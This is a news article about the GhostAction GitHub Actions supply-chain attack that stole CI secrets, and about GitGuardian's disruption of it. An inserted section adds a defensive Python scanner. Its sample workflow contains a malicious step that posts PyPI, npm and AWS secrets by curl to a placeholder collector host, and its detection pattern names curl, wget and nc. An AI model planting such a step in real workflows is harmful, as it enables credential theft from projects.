- The GhostAction attack stole 3,325 secrets from 327 GitHub accounts
- GitGuardian helped stop it and alerted the affected projects
- A separate npm attack hit more than 2,000 accounts but was not linked
Thousands of secrets, including PyPI and AWS keys, GitHub tokens and more, were recently stolen in a supply chain attack against GitHub projects, nicknamed "GhostAction". The attack was spotted by GitGuardian security researchers, who reported it to GitHub and helped get it shut down.
GitGuardian researchers first noticed the attack when they were told that a GitHub project called fastuuid had been compromised. The account responsible for the project had evidently been breached and was used to push a malicious GitHub Actions workflow called "Add GitHub Actions Security Workflow".
The workflow was designed to steal secrets, including PyPI, npm, DockerHub, GitHub, Cloudflare and AWS credentials.
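A workflow of this kind has a recognisable shape: a step that expands repository secrets (`${{ secrets.X }}`) and hands them to a network tool pointed at a host outside GitHub. The scanner below is an added example written for this article; it is not GitGuardian's tooling or code from the article or from any affected project. It is regex-based so it runs with the Python standard library alone, the sample workflow text is constructed for the example, and the hostnames in it are placeholders rather than indicators from the real campaign.

```python
"""Flag GitHub Actions steps that expand repository secrets and send them
to a host outside an allowlist (the GhostAction exfiltration pattern).
Added example: regex-based, standard library only. All sample data is
constructed; the collector hostname is a placeholder, not a real indicator.
"""
import re
from dataclasses import dataclass

# Expression that expands a repository secret inside a workflow.
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
# Hostnames of URLs that appear in a step body.
URL_REF = re.compile(r"https?://([A-Za-z0-9.-]+)")
# Tools a run: step would use to push data over the network.
NET_TOOLS = re.compile(r"\b(curl|wget|nc|Invoke-WebRequest|python\s+-c)\b")

# Hosts a legitimate workflow may legitimately talk to (assumption: tune per repo).
DEFAULT_ALLOWED_HOSTS = ("github.com", "api.github.com")


@dataclass
class Finding:
    step: str
    secrets: list
    hosts: list


def split_steps(workflow_text):
    """Split a workflow into (step name, step body) pairs.

    Assumption: every step is introduced by a '- name:' line, which is
    enough for a triage pass without a YAML parser.
    """
    parts = re.split(r"^\s*-\s*name:\s*", workflow_text, flags=re.M)
    steps = []
    for part in parts[1:]:
        name, _, body = part.partition("\n")
        steps.append((name.strip().strip("\"'"), body))
    return steps


def find_exfil_steps(workflow_text, allowed_hosts=DEFAULT_ALLOWED_HOSTS):
    """Return a Finding for each step that both expands secrets and
    references a non-allowlisted host via a network tool."""
    findings = []
    for name, body in split_steps(workflow_text):
        secrets = sorted(set(SECRET_REF.findall(body)))
        hosts = sorted({h for h in URL_REF.findall(body) if h not in allowed_hosts})
        if secrets and hosts and NET_TOOLS.search(body):
            findings.append(Finding(name, secrets, hosts))
    return findings


# Constructed sample: a benign step talking to api.github.com, followed by a
# step that bundles several secrets and POSTs them to an outside collector.
SAMPLE_WORKFLOW = """\
name: Add GitHub Actions Security Workflow
on: [push]
jobs:
  audit:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Publish
        run: |
          curl -s https://api.github.com/repos/${{ github.repository }}
      - name: Security audit
        env:
          TOKENS: ${{ secrets.PYPI_TOKEN }} ${{ secrets.NPM_TOKEN }}
        run: |
          curl -s -X POST -d "$TOKENS ${{ secrets.AWS_SECRET_ACCESS_KEY }}" https://collector.example.net/upload
"""

if __name__ == "__main__":
    for f in find_exfil_steps(SAMPLE_WORKFLOW):
        print(f"step {f.step!r} sends {f.secrets} to {f.hosts}")
```

Run against the sample, the "Publish" step is ignored (it references no secrets and only an allowlisted host) while "Security audit" is reported with its three secrets and the collector host. The check is a triage aid, not a complete defence: it misses secrets that reach a third-party action through `env:` or `with:` blocks, encoded or split hostnames, and tools outside the `NET_TOOLS` list, so treat any hit as a reason to read the workflow diff and rotate the referenced secrets rather than as the whole investigation.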
The exfiltration server went offline
The researchers reported their findings to PyPI, and the project was placed in a read-only state. Shortly afterwards, the legitimate account owner regained access and reverted the malicious commit.
However, the attacker did not react over the following two days, and GitGuardian researchers concluded that they were most likely busy compromising other projects. They were right: a deeper investigation uncovered 327 compromised accounts and 3,325 exposed secrets.
"After our impact assessment, we started alerting the affected users and projects by creating issues in each compromised repository," GitGuardian said in its report. "Of the 817 affected repositories, 100 had already reverted the malicious changes. We managed to create issues for 573 of the remaining 717 projects; the others had been deleted or had issues disabled."
Shortly after GhostAction was discovered, the server to which the secrets were being exfiltrated stopped resolving, meaning the campaign was successfully disrupted.
GitGuardian was also alerted to s1ngularity, an npm supply chain attack that compromised more than 2,000 GitHub accounts and led to the leak of thousands of tokens and credentials. Because the two attacks happened at almost the same time, the researchers hypothesised that they might be part of the same campaign. The investigation, however, determined that they were two separate incidents:
"From this initial investigation, we have found no intersection between these users and the recent victims of the s1ngularity attack campaign. These two incidents are probably unrelated," they concluded.
Via BleepingComputer